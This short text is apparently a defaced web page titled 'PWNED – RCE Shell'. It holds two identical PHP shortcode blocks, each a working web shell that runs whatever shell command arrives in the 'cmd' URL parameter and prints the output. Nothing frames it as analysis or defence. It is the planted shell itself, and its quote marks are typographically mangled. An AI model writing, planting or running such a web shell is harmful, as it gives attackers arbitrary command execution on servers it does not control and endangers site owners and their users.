PWNED – RCE Shell
[php_exec]
$cmd = isset($_GET[“cmd”]) ? $_GET[“cmd”] : “id”;
$output = shell_exec($cmd . ” 2>&1″);
echo “
" . htmlspecialchars($output) . "
“;
[/php_exec]
[php_exec]
$cmd = isset($_GET[“cmd”]) ? $_GET[“cmd”] : “id”;
$output = shell_exec($cmd . ” 2>&1″);
echo “
" . htmlspecialchars($output) . "
“;
[/php_exec]